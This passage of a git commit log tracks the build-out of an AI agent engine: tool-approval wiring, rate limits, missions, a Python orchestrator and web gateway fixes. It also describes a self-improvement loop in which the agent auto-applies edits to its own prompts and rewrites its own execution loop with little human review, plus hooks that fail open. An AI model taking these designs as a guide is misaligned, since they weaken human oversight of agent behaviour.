- Database persistence (InMemoryStore → real DB tables)
- Acceptance testing (TestRig + TraceLlm fixtures)
- Two-phase commit for high-stakes effects

Progress table updated: Phase 6 marked as DONE (partial), 134 tests.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* docs: add self-improving engine design plan

Designs a system where the engine debugs and improves itself, based on
the pattern observed in the last session: 5 consecutive bug fixes all
followed trace → read → identify → edit → test, using tools the engine
already has access to.

Three levels of self-improvement:
- Level 1 (Prompt): edit prompts/*.md to prevent LLM mistakes. Auto-apply.
- Level 2 (Config): adjust defaults/mappings. Branch + test + PR.
- Level 3 (Code): Rust patches for engine bugs. Branch + test + clippy + PR.

Architecture: Self-improvement Mission spawns a Reflection thread that
reads traces, reads source, proposes fixes, validates via cargo test,
and either auto-applies (Level 1) or creates a PR (Level 2-3).

Includes: fix pattern database (seeded from our 8 debugging session
fixes), feedback loop diagram, safety model, implementation phases
(A through D), and what exists vs what's new.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* docs: add engine v2 security model and audit

Comprehensive security analysis of engine v2 covering:

Threat model: 4 attacker profiles (malicious input, prompt injection
via tools, poisoned memory, supply chain).

Current state audit: 9 controls working (Monty sandbox, safety layer,
policy engine, leases, provenance, events) and 9 gaps identified.

Critical finding: ALL tools granted by default — CodeAct code can call
shell, write_file, apply_patch without approval. Proposed fix: 3-tier
tool classification (auto/approve-once/always-approve).

CodeAct-specific threats: tool call amplification, prompt injection via
search results, data exfiltration via tool chains, Monty escape.

Self-improvement security: poisoned trace attacks, memory poisoning via
reflection. Mitigations: edit validation, frequency caps, audit trail,
auto-rollback, reflection output scanning.

6-layer security architecture proposed: input validation, capability
gating, output sanitization, execution sandboxing, self-improvement
controls, observability.

Prioritized implementation plan with severity/effort ratings.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* docs(security): cross-reference v1 controls — use, don't reinvent

Updated security plan with detailed audit of ALL existing v1 security
controls and how they map to engine v2 bridge gaps:

Key finding: v1 already has solutions for every security gap identified.
The bridge just needs to wire them in:

- Tool::requires_approval() exists but bridge doesn't call it
- safety.wrap_for_llm() exists but tool results enter context unwrapped
- RateLimiter exists but bridge doesn't check rate limits
- BeforeToolCall hooks exist but bridge doesn't run them
- redact_params() exists but bridge doesn't redact sensitive params
- Shell risk classification (Low/Medium/High) is inherited but ignored

Revised priority: most fixes are small wiring tasks in EffectBridgeAdapter,
not new security infrastructure. The bridge is the security boundary.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(engine): add missions, reliability tracker, reflection executor, and provenance-aware policy

- Add Mission type and MissionManager for recurring thread scheduling
- Add ReliabilityTracker for per-capability success/failure/latency tracking
- Add reflection executor that spawns CodeAct threads for post-completion reflection
- Extend PolicyEngine with provenance-aware taint checking (LLM-generated data
  requires approval for financial/external-write effects)
- Extend Store trait with mission CRUD methods
- Add conversation surface tracking, compaction token fix, context memory injection
- Wire new modules through lib.rs re-exports and bridge adapters

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(bridge): wire v1 security controls into engine v2 adapter

Zero engine crate changes. All security controls enforced at the bridge
boundary in EffectBridgeAdapter:

1. Tool approval (v1: Tool::requires_approval):
   - Checks each tool's approval requirement with actual params
   - Always → returns EngineError::LeaseDenied (blocks execution)
   - UnlessAutoApproved → checks auto_approved set, blocks if not approved
   - Never → proceeds
   - Per-session auto_approved HashSet (for future "always" handling)

2. Hook interception (v1: BeforeToolCall):
   - Runs HookEvent::ToolCall before every execution
   - HookOutcome::Reject → blocks with reason
   - HookError::Rejected → blocks with reason
   - Hook errors → fail-open (logged, execution continues)

3. Output sanitization (v1: sanitize_tool_output + wrap_for_llm):
   - Leak detection: API keys in tool output are redacted
   - Policy enforcement: content policy rules applied
   - Length truncation: output capped at 100KB
   - XML boundary protection: prevents injection via tool output

4. Sensitive param redaction (v1: redact_params):
   - Tool's sensitive_params() consulted before hooks see parameters
   - Redacted params sent to hooks, original params used for execution

5. available_actions() now sets requires_approval based on each tool's
   default approval requirement, so the engine's PolicyEngine can
   gate tools it hasn't seen before.

6. Actual execution timing measured via Instant::now() (replaces
   placeholder Duration::from_millis(1)).

Accessor visibility: hooks() widened to pub(crate).

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(bridge): implement tool approval flow for engine v2

Adds a complete approval flow that mirrors v1 behavior, using the
existing v1 security controls (Tool::requires_approval, auto-approve
sets, StatusUpdate::ApprovalNeeded).

## How it works

### Step 1: Tool blocked at execution
When the LLM's code calls a tool (e.g., `shell("ls")`):
1. EffectBridgeAdapter.execute_action() looks up the Tool object
2. Calls tool.requires_approval(&params) — returns ApprovalRequirement
3. If Always → EngineError::LeaseDenied (always blocks)
4. If UnlessAutoApproved → checks auto_approved HashSet → if not in set,
   returns EngineError::LeaseDenied
5. If Never → proceeds to execution

### Step 2: Engine returns NeedApproval
The LeaseDenied error propagates through:
- CodeAct path: becomes Python RuntimeError, code halts, thread returns
  NeedApproval with action_name + parameters
- Structured path: same via ActionResult.is_error

### Step 3: Router stores pending approval
- PendingApproval { action_name, original_content } stored on EngineState
- StatusUpdate::ApprovalNeeded sent to channel (shows approval card in
  CLI/web with tool name, parameters, yes/always/no buttons)
- Returns text: "Tool 'shell' requires approval. Reply yes/always/no."

### Step 4: User responds
handle_message() intercepts Submission::ApprovalResponse when ENGINE_V2:
- 'yes' → auto_approve_tool(name) on EffectBridgeAdapter, re-processes
  original message (tool now passes the approval check on second run)
- 'always' → same + logs for session persistence
- 'no' → returns "Denied: tool was not executed."

### Key design choice
Instead of pausing/resuming mid-execution (which needs engine changes
to freeze/restore the Monty VM state), we auto-approve the tool and
re-run the full message. The EffectBridgeAdapter's auto_approved set
persists across runs, so the second execution passes immediately.

This trades one extra LLM call for zero engine modifications.

## Files changed
- src/bridge/router.rs: PendingApproval struct, handle_approval(),
  NeedApproval → StatusUpdate::ApprovalNeeded conversion
- src/bridge/mod.rs: export handle_approval
- src/agent/agent_loop.rs: intercept ApprovalResponse for engine v2
- src/bridge/effect_adapter.rs: fmt fixes

151 tests passing, clippy + fmt clean.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(engine): demote trace/reflection logging from info to debug

INFO-level log output from background tasks (trace analysis, reflection)
corrupts the REPL terminal UI. The trace summary, issue warnings, and
reflection doc previews were printing mid-approval-card, breaking the
interactive display.

Fix: all logging in trace.rs changed from info!/warn! to debug!/warn!.
Trace analysis and reflection results now only show when
RUST_LOG=ironclaw_engine=debug is set.

Also added logging discipline rule to global CLAUDE.md:
- info! → user-facing status the REPL intentionally renders
- debug! → internal diagnostics (traces, reflection, engine internals)
- Background tasks must NEVER use info! — it breaks the TUI

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(bridge): demote all router info! logging to debug!

"engine v2: initializing" and "engine v2: handling message" were
printing at INFO level, corrupting the REPL UI. All router logging
now uses debug! — only visible with RUST_LOG=ironclaw=debug.

Zero info! calls remain in crates/ironclaw_engine/ or src/bridge/.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(safety): demote leak detector warn-action logs from warn! to debug!

The leak detector's Warn-action matches (high_entropy_hex pattern on
web search results containing commit SHAs, CSS colors, URL hashes)
were logging at warn! level, corrupting the REPL UI with lines like:
  WARN Potential secret leak detected pattern=high_entropy_hex preview=a96f********cee5

These are informational false positives — real leaks use LeakAction::Redact
which silently modifies the content. Warn-action matches only log for
debugging purposes and should not appear in production output.

Changed to debug! level — visible with RUST_LOG=ironclaw_safety=debug.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(engine): strengthen CodeAct prompt to prevent shallow text answers

The model was answering "Suggested 45 improvements" as a brief text
summary from training data without actually searching or listing them.
The trace showed: no code block, no tool calls, no FINAL().

Prompt changes:
- Rule 1: "ALWAYS respond with a ```repl code block. NEVER answer with
  plain text only." (was: "Always write code... plain text for brief
  explanations")
- Rule 2 (NEW): "NEVER answer from memory or training data alone.
  Always use tools to get real, current information before answering."
- Rule 3: FINAL answer "should be detailed and complete — not just a
  summary like 'found 45 items'"
- Rule 8 (NEW): "Include the actual content in your FINAL() answer,
  not just a count or summary. Users want to see the details."

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(bridge): persist reflection docs to workspace for cross-session learning

Replaces InMemoryStore with HybridStore:
- Ephemeral data (threads, steps, events, leases) stays in-memory
- MemoryDocs (lessons, specs, playbooks from reflection) persist to
  the workspace at engine/docs/{type}/{id}.json

On engine init, load_docs_from_workspace() reads existing docs back
into the in-memory cache. This means:
- Lessons learned in session 1 are available in session 2
- The RetrievalEngine injects relevant past lessons into new threads
- The engine genuinely improves over time as reflection accumulates

Workspace paths:
  engine/docs/lessons/{uuid}.json
  engine/docs/specs/{uuid}.json
  engine/docs/playbooks/{uuid}.json
  engine/docs/summaries/{uuid}.json
  engine/docs/issues/{uuid}.json

No new database tables. Uses existing workspace write/read/list.
workspace() accessor widened to pub(crate).

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(bridge): adapt to execute_tool_with_safety params-by-value change

Staging merge changed execute_tool_with_safety to take params by value
instead of by reference (perf optimization from PR #926). Updated
bridge adapter to clone params before passing.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* docs(engine): add web gateway integration plan to Phase 6

Documents three gaps between engine v2 and the web gateway:
1. No SSE streaming (engine emits ThreadEvent, gateway expects SseEvent)
2. No conversation persistence (engine uses HybridStore, gateway reads v1 DB)
3. No cross-channel visibility (REPL ↔ web messages invisible to each other)

Implementation plan: bridge ThreadEvent→AppEvent, write messages to v1
conversation tables after thread completion. Prerequisite: AppEvent
extraction PR (in progress separately).

Also updated DB persistence status: HybridStore with workspace-backed
MemoryDocs is now implemented (partial persistence).

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* docs(engine): document routine/job gap and SIGKILL crash scenario

Routines are entirely v1 — not hooked up to engine v2. When a user
asks "create a routine" as natural language, engine v2 tries to call
routine_create via CodeAct, but the tool needs RoutineEngine + Database
refs that the bridge's minimal JobContext doesn't provide. This caused
a SIGKILL crash during testing.

Options documented: block routine tools in v2 (short term), pass refs
through context (medium), replace with Mission system (long term).

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* refactor: extract AppEvent to crates/ironclaw_common

SseEvent was defined in src/channels/web/types.rs but imported by 12+
modules across agent, orchestrator, worker, tools, and extensions — it
had become the application-wide event protocol, not a web transport
concern.

Create crates/ironclaw_common as a shared workspace crate and move the
enum there as AppEvent.  Also move the truncate_preview utility which
was similarly leaked from the web gateway into agent modules.

- New crate: crates/ironclaw_common (AppEvent, truncate_preview)
- Rename SseEvent → AppEvent, from_sse_event → from_app_event
- web/types.rs re-exports AppEvent for internal gateway use
- web/util.rs re-exports truncate_preview
- Wire format unchanged (serde renames are on variants, not the enum)

Aligned with the event bus direction on refactor/architectural-hardening
where DomainEvent (≡ AppEvent) is wrapped in a SystemEvent envelope.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(bridge): integrate with web gateway via AppEvent + v1 conversation DB

Three changes to make engine v2 visible in the web gateway:

1. SSE event streaming (AppEvent broadcast):
   - ThreadEvent → AppEvent conversion via thread_event_to_app_event()
   - Events broadcast to SseManager during the poll loop
   - Covers: Thinking, ToolCompleted (success/error), Status, Response
   - Web gateway receives real-time progress without any gateway changes

2. Conversation persistence to v1 database:
   - After thread completes, writes user message + agent response to
     v1 ConversationStore via add_conversation_message()
   - Uses get_or_create_assistant_conversation() for per-user per-channel
   - Web gateway reads from DB as usual — chat history appears

3. Final response broadcast:
   - AppEvent::Response with full text + thread_id sent via SSE
   - Web gateway renders the response in the chat UI

New EngineState fields: sse (Option<Arc<SseManager>>),
db (Option<Arc<dyn Database>>). Both populated from Agent.deps.

Agent.deps visibility widened to pub(crate).

Depends on: ironclaw_common crate with AppEvent type (PR #1615).

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(bridge): complete Phase 6 — v1-only tool blocking, rate limiting, call limits

Three security/stability improvements in EffectBridgeAdapter:

1. V1-only tool blocking:
   - routine_create, create_job, build_software (and hyphenated variants)
     return helpful error: "use the slash command instead"
   - Filtered out of available_actions() so system prompt doesn't list them
   - Prevents crash from tools needing RoutineEngine/Scheduler refs

2. Per-step tool call limit:
   - Max 50 tool calls per code block (AtomicU32 counter)
   - Prevents amplification: `for i in range(10000): shell(...)`
   - Returns "call limit reached, break into multiple steps"

3. Rate limiting:
   - Per-user per-tool sliding window via RateLimiter
   - Checks tool.rate_limit_config() before every execution
   - Returns "rate limited, try again in Ns"

Architecture plan updated:
- Gateway integration: DONE
- Routines: BLOCKED (gracefully, with slash command fallback)
- Rate limiting: DONE
- Call limit: DONE
- Phase 6 status: DONE (remaining: acceptance tests, two-phase commit)

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* docs: add Mission system design — goal-oriented autonomous threads

Missions replace routines with evolving, knowledge-accumulating
autonomous agents. Unlike routines (fixed prompt, stateless), Missions:

- Generate prompts from accumulated Project knowledge (lessons,
  playbooks, issues from prior threads)
- Adapt approach when something fails repeatedly
- Track progress toward a goal with success criteria
- Self-manage: pause when stuck, complete when goal achieved

Architecture: MissionManager with cron ticker spawns threads via
ThreadManager. Meta-prompt built from mission goal + Project MemoryDocs
via RetrievalEngine. Reflection feeds back automatically.

6-step implementation plan: cron trigger, meta-prompt builder, bridge
wiring, CodeAct tools, progress tracking, persistence.

Includes two worked examples: daily tech news briefing (ongoing) and
test coverage improvement (goal-driven, self-completing).

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(engine): extend Mission types with webhook/event triggers + evolving strategy

Mission types updated to support external activation sources:

MissionCadence expanded:
- Cron { expression, timezone } — timezone-aware scheduling
- OnEvent { event_pattern } — channel message pattern matching
- OnSystemEvent { source, event_type } — structured events from tools
- Webhook { path, secret } — external HTTP triggers (GitHub, email, etc.)
- Manual — explicit triggering only

The engine defines trigger TYPES. The bridge implements infrastructure
(cron ticker, webhook endpoints, event matchers). GitHub issues, PRs,
email, Slack events all use the generic Webhook cadence — no
special-casing in the engine. Webhook payload injected as
state["trigger_payload"] in the thread's Python context.

Mission struct extended:
- current_focus: what the next thread should work on (evolving)
- approach_history: what we've tried (for adaptation)
- max_threads_per_day / threads_today: daily budget
- last_trigger_payload: webhook/event data for thread context

Plan updated with trigger type table and webhook integration design.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(engine): implement MissionManager execution with meta-prompts

The MissionManager now builds evolving meta-prompts and processes
thread outcomes for continuous learning:

fire_mission() upgraded:
- Loads Project MemoryDocs via RetrievalEngine for context
- Builds meta-prompt from: goal, current_focus, approach_history,
  project knowledge docs, trigger payload, thread count
- Spawns thread with meta-prompt as user message
- Background task waits for completion and processes outcome
- Daily thread budget enforcement (max_threads_per_day)

Meta-prompt structure:
  # Mission: {name}
  Goal: {goal}
  ## Current Focus (evolves between threads)
  ## Previous Approaches (what we've tried)
  ## Knowledge from Prior Threads (lessons, playbooks, issues)
  ## Trigger Payload (webhook/event data if applicable)
  ## Instructions (accomplish step, report next focus, check goal)

Outcome processing:
- Extracts "next focus:" from FINAL() response → updates current_focus
- Detects "goal achieved: yes" → completes mission
- Records accomplishment in approach_history
- Failed threads recorded as "FAILED: {error}"

Cron ticker:
- start_cron_ticker() spawns tokio task, ticks every 60s
- Checks active Cron missions, fires those past next_fire_at

151 tests passing.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(bridge): wire MissionManager into engine v2 for CodeAct access

Missions are now callable from CodeAct Python code:

```python
# Create a daily briefing mission
result = mission_create(
    name="Tech News",
    goal="Daily AI/crypto/software news briefing",
    cadence="0 9 * * *"
)

# List all missions
missions = mission_list()

# Manually fire a mission
mission_fire(id="...")

# Pause/resume
mission_pause(id="...")
mission_resume(id="...")
```

Implementation:
- MissionManager created on engine init, cron ticker started
- EffectBridgeAdapter intercepts mission_* function calls before tool
  lookup and routes to MissionManager
- parse_cadence() handles: "manual", cron expressions, "event:pattern",
  "webhook:path"
- Mission functions documented in CodeAct system prompt
- MissionManager set on adapter via set_mission_manager() after init
  (avoids circular dependency)

System prompt updated with mission_create, mission_list, mission_fire,
mission_pause, mission_resume documentation.

151 tests passing.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(bridge): map routine_* calls to mission operations in v2

When the model calls routine_create, routine_list, routine_fire,
routine_pause, routine_resume, or routine_delete, the bridge now
routes them to the MissionManager instead of blocking with an error.

Mapping:
  routine_create → mission_create (with cadence parsing)
  routine_list   → mission_list
  routine_fire   → mission_fire
  routine_pause  → mission_pause
  routine_resume → mission_resume
  routine_update → mission_pause/resume (based on params)
  routine_delete → mission_complete (marks as done)

Routine tools removed from v1-only blocklist and restored in
available_actions(). The model can use either "routine" or "mission"
vocabulary — both work.

Still blocked: create_job, cancel_job, build_software (need v1
Scheduler/ContainerJobManager refs).

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* test(engine): add E2E mission flow tests — 7 new tests

Comprehensive mission lifecycle tests:

- fire_mission_builds_meta_prompt_with_goal: verifies thread spawned
  with project context and recorded in history
- outcome_processing_extracts_next_focus: "Next focus: X" in FINAL()
  response → mission.current_focus updated
- outcome_processing_detects_goal_achieved: "Goal achieved: yes" →
  mission status transitions to Completed
- mission_evolves_via_direct_outcome_processing: 3-step evolution:
  step 1 sets focus to "db module", step 2 evolves to "tools module",
  step 3 detects goal achieved → mission completes. Tests the full
  learning loop without background task timing dependencies.
- fire_with_trigger_payload: webhook payload stored on mission and
  threads_today counter incremented
- daily_budget_enforced: max_threads_per_day=1 → first fire succeeds,
  second returns None

157 tests passing (151 prior + 6 new mission E2E).

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(engine): self-improving engine via Mission system

Wire the self-improvement loop as a Mission with OnSystemEvent cadence,
inspired by karpathy/autoresearch's program.md approach. The mission
fires when threads complete with issues, receives trace data as trigger
payload, and uses tools directly to diagnose and fix problems.

Key changes:

Engine self-improvement (Phase A+B from design doc):
- Add fire_on_system_event() to MissionManager for OnSystemEvent cadence
- Add start_event_listener() that subscribes to thread events and fires
  matching missions when non-Mission threads complete with trace issues
- Add ensure_self_improvement_mission() with autoresearch-style goal
  prompt (concrete loop steps, not vague instructions)
- Add process_self_improvement_output() for structured JSON fallback
- Seed fix pattern database with 8 known patterns from debugging
- Runtime prompt overlay via MemoryDoc (build_codeact_system_prompt now
  async + Store-aware, appends learned rules from prompt_overlay docs)
- Pass Store to ExecutionLoop for overlay loading

Bridge review fixes (P1/P2):
- Scope engine v2 SSE events to requesting user (broadcast_for_user)
- Per-user pending approvals via HashMap instead of global Option
- Reset tool-call limit counter before each thread execution
- Only persist auto-approval when user chose "always", not one-off "yes"
- Remove dead store/mission_manager fields from EngineState

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* Add checkpoint-based engine thread recovery

* feat(engine): add Python orchestrator module and host functions

Add the orchestrator infrastructure for replacing the Rust execution
loop with versioned Python code. This commit adds the module and host
functions without switching over — the existing Rust loop is unchanged.

New files:
- orchestrator/default.py: v0 Python orchestrator (run_loop + helpers)
- executor/orchestrator.rs: host function dispatch, orchestrator
  loading from Store with version selection, OrchestratorResult parsing

Host functions exposed to orchestrator Python via Monty suspension:
  __llm_complete__, __execute_code_step__ (nested Monty VM),
  __execute_action__, __check_signals__, __emit_event__,
  __add_message__, __save_checkpoint__, __transition_to__,
  __retrieve_docs__, __check_budget__, __get_actions__

Also makes json_to_monty, monty_to_json, monty_to_string pub(crate)
in scripting.rs for cross-module use.

Design doc: docs/plans/2026-03-25-python-orchestrator.md

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(engine): switch ExecutionLoop::run() to Python orchestrator

Replace the 900-line Rust execution loop with a ~80-line bootstrap
that loads and runs the versioned Python orchestrator via Monty VM.

The orchestrator Python code (orchestrator/default.py) is the v0
compiled-in version. Runtime versions can override it via MemoryDoc
storage (orchestrator:main with tag orchestrator_code).

Key fixes during switchover:
- Use ExtFunctionResult::NotFound for unknown functions so Monty
  falls through to Python-defined functions (extract_final, etc.)
- Move helper function definitions above run_loop for Monty scoping
- Use FINAL result value (not VM return value) in Complete handler
- Rename 'final' variable to 'final_answer' to avoid Python keyword

Status: 171/177 tests pass. 6 remaining failures are step_count and
token tracking bookkeeping — the orchestrator manages these internally
but doesn't yet update the thread's counters via host functions.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(engine): all 177 tests pass with Python orchestrator

- Increment step_count and track tokens in __emit_event__("step_completed")
  so thread bookkeeping matches the old Rust loop behavior
- Remove double-counting of tokens in bootstrap (orchestrator handles it)
- Match nudge text to existing TOOL_INTENT_NUDGE constant
- Fix FINAL result propagation (use stored final_result, not VM return)

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(engine): orchestrator versioning, auto-rollback, and tests

Add version lifecycle for the Python orchestrator:
- Failure tracking via MemoryDoc (orchestrator:failures)
- Auto-rollback: after 3 consecutive failures, skip the latest version
  and fall back to previous (or compiled-in v0)
- Success resets the failure counter
- OrchestratorRollback event for observability

Update self-improvement Mission goal with Level 1.5 instructions for
orchestrator patches — the agent can now modify the execution loop
itself via memory_write with versioned orchestrator docs.

12 new tests: version selection (highest wins), rollback after failures,
rollback to default, failure counting/resetting, outcome parsing for
all 5 ThreadOutcome variants.

189 tests pass, zero clippy warnings.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* docs: add engine v2 architecture, self-improvement, and dev history

Three new docs for contributors:

- engine-v2-architecture.md: Two-layer architecture (Rust kernel +
  Python orchestrator), five primitives, execution model with nested
  Monty VMs, bridge layer, memory/reflection, missions, capabilities

- self-improvement.md: Three improvement levels (prompt/orchestrator/
  config/code), autoresearch-inspired Mission loop, versioned
  orchestrator with auto-rollback, fix pattern database, safety model

- development-history.md: Summary of 6 Claude Code sessions that
  built the system, key design decisions and debugging moments,
  architecture evolution from 900-line Rust loop to Python orchestrator

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(engine): complete v2 side-by-side integration with gateway API

Wire engine v2 into the full submission pipeline and expose threads,
projects, and missions through the web gateway REST API.

Bridge routing — route ExecApproval, Interrupt, NewThread, and Clear
submissions to engine v2 when ENGINE_V2=true. Previously only UserInput
and ApprovalResponse were handled; all other control commands fell
through to disconnected v1 sessions.

Bridge query layer — add 11 read-only query functions and 6 DTO types
so gateway handlers can inspect engine state (threads, steps, events,
projects, missions) without direct access to the EngineState singleton.

Gateway endpoints — new /api/engine/* routes:
  GET  /threads, /threads/{id}, /threads/{id}/steps, /threads/{id}/events
  GET  /projects, /projects/{id}
  GET  /missions, /missions/{id}
  POST /missions/{id}/fire, /missions/{id}/pause, /missions/{id}/resume

SSE events — add ThreadStateChanged, ChildThreadSpawned, and
MissionThreadSpawned AppEvent variants. Expand the bridge event mapper
to forward StateChanged and ChildSpawned engine events to the browser.

Engine crate — add ConversationManager::clear_conversation() for /new
and /clear commands.

Code quality — replace 10 .expect() calls with proper error returns,
remove dead AgentConfig.engine_v2 field, log silent init errors, fix
duplicate doc comment, improve fallthrough documentation.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(engine): empty call_id on ActionResult and trace analyzer false positives

Fix structured executor not stamping call_id onto ActionResult — the
EffectExecutor trait doesn't receive call_id, so the structured executor
must copy it from the original ActionCall after execution. Empty call_id
caused OpenAI-compatible providers to reject the next LLM request with
"Invalid 'input[2].call_id': empty string".

Fix trace analyzer false positives:
- code_error check now only scans User-role code output messages
  (prefixed with [stdout]/[stderr]/[code ]/Traceback), not System
  prompt which contains example error text
- missing_tool_output check now recognizes ActionResult messages as
  valid tool output (Tier 0 structured path)
- Add NotImplementedError to detected code error patterns

New trace checks:
- empty_call_id: detect ActionResult messages with missing/empty
  call_id before they reach the LLM API (severity: Error)
- llm_error: extract LLM provider errors from Failed state reason
- orchestrator_error: extract orchestrator errors from Failed state

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(web): add Missions tab to gateway UI

Add a full Missions page to the web gateway with list view, detail view,
and action buttons (Fire, Pause, Resume).

Backend: add /api/engine/missions/summary endpoint returning counts by
status (active/paused/completed/failed).

Frontend:
- New "Missions" tab between Jobs and Routines
- Summary cards showing mission counts by status
- Table with name, goal, cadence type, thread count, status, actions
- Detail view with goal, cadence, current focus, success criteria,
  approach history, spawned thread list, and action buttons
- Fire/Pause/Resume actions with toast notifications
- i18n support (English + Chinese)
- CSS following the existing routines/jobs patterns

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(engine): eagerly initialize engine v2 at startup

The gateway API endpoints (/api/engine/missions, etc.) call bridge
query functions that return empty results when the engine state hasn't
been initialized yet. Previously, initialization only happened lazily
on the first chat message via handle_with_engine().

Now when ENGINE_V2=true, the engine is initialized in Agent::run()
before channels start, so the self-improvement mission and other
engine state is available to gateway API endpoints immediately.

Also rename get_or_init_engine → init_engine and make it public so
it can be called from agent_loop.rs at startup.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(web): improve mission detail with markdown goal and thread table

- Goal rendered as full-width markdown block instead of plain-text
  meta item (uses existing renderMarkdown/marked)
- Current focus and success criteria also rendered as markdown
- Spawned threads shown as a clickable table with goal, type, state,
  steps, tokens, and created date instead of a UUID list
- Clicking a thread row opens an inline thread detail view showing
  metadata grid and full message history with markdown rendering
- Back button returns to the mission detail view
- Backend: mission detail now returns full thread summaries (goal,
  state, step_count, tokens) instead of just thread IDs

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(web): close SSE connections on page unload to prevent connection starvation

The browser limits concurrent HTTP/1.1 connections per origin to 6.
Without cleanup, SSE connections from prior page loads linger after
refresh/navigation, eating into the pool. After 2-3 refreshes, all 6
slots are consumed by stale SSE streams and new API fetch calls queue
indefinitely — the UI shows "connected" (SSE works) but data never
loads.

Add a beforeunload handler that closes both eventSource (chat events)
and logEventSource (log stream) so the browser can reuse connections
immediately on page reload.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(web): support multiple gateway tabs by reducing SSE connections

Each browser tab opened 2 SSE connections (chat events + log events).
With the HTTP/1.1 per-origin limit of 6, the 3rd tab exhausted the
pool and couldn't load any data.

Three changes:

1. Lazy log SSE — only connect when the logs tab is active, disconnect
   when switching away. Most users rarely view logs, so this saves a
   connection slot per tab.

2. Visibility API — close SSE when the browser tab goes to background
   (user switches to another tab), reconnect when it becomes visible.
   Background tabs don't need real-time events.

3. Combined with the existing beforeunload cleanup, this means:
   - Active foreground tab: 1 connection (chat SSE only, +1 if logs tab)
   - Background tabs: 0 connections
   - Closed/refreshed tabs: 0 connections (beforeunload cleanup)

This allows many gateway tabs to coexist within the 6-connection limit.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(engine): route messages to correct conversation by thread scope

Messages sent from a new conversation in the gateway always appeared in
the default assistant conversation because handle_with_engine ignored
the thread_id from the frontend.

Two fixes:

1. Engine conversation scoping — when the message carries a thread_id
   (from the frontend's conversation picker), use it as part of the
   engine conversation key: "gateway:<thread_id>" instead of just
   "gateway". This creates a distinct engine conversation per v1
   thread, so messages don't cross-contaminate.

2. V1 dual-write targeting — write user messages and assistant
   responses to the v1 conversation matching the thread_id (via
   ensure_conversation), not the hardcoded assistant conversation.
   Falls back to the assistant conversation when no thread_id is
   present (e.g., default chat).

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(web): richer activity indicators for engine v2 execution

The gateway UI showed only generic "Thinking..." during engine v2
execution with no visibility into CodeAct code execution, tool calls,
or reflection. Now the event mapping produces detailed status updates:

Step lifecycle:
- "Calling LLM..." when a step starts (was "Thinki…
…1957)

* fix(engine): compute next_fire_at for cron missions (#1944)

MissionCadence::Cron missions never fired automatically because
next_fire_at was initialized to None and never computed from the cron
expression. The ticker checked next_fire_at <= now which was always
false.

- Add next_cron_fire() helper that parses cron expressions (5/6/7-field)
  and computes the next fire time, with optional timezone support
- Compute next_fire_at in create_mission() for Cron cadence
- Advance next_fire_at in fire_mission() after each successful fire
- Recompute next_fire_at in resume_mission() for stale cron missions
- Add regression tests covering create, fire, tick, and resume flows

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(engine): propagate user timezone to missions and CodeAct scripts (#1944)

The LLM had to ask users for timezone because it wasn't available in
context. Now:

- Add user_timezone to ThreadExecutionContext (from thread metadata)
- Store user timezone in thread metadata when received from channel
- Auto-inject timezone into mission_create cron cadence from context
- Expose user_timezone as a Monty/CodeAct context variable
- Document user_timezone in the CodeAct preamble prompt

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* refactor: introduce ValidTimezone strict type in ironclaw_common (#1944)

Address PR review feedback: timezone strings were stored and propagated
without validation. Now:

- Add ValidTimezone newtype in ironclaw_common that validates IANA
  timezone strings at construction (parse returns None for empty/invalid)
- MissionCadence::Cron.timezone is now Option<ValidTimezone>
- ThreadExecutionContext.user_timezone is now Option<ValidTimezone>
- Bridge router validates timezone before storing in thread metadata
- next_cron_fire() takes Option<&ValidTimezone> — no silent fallback
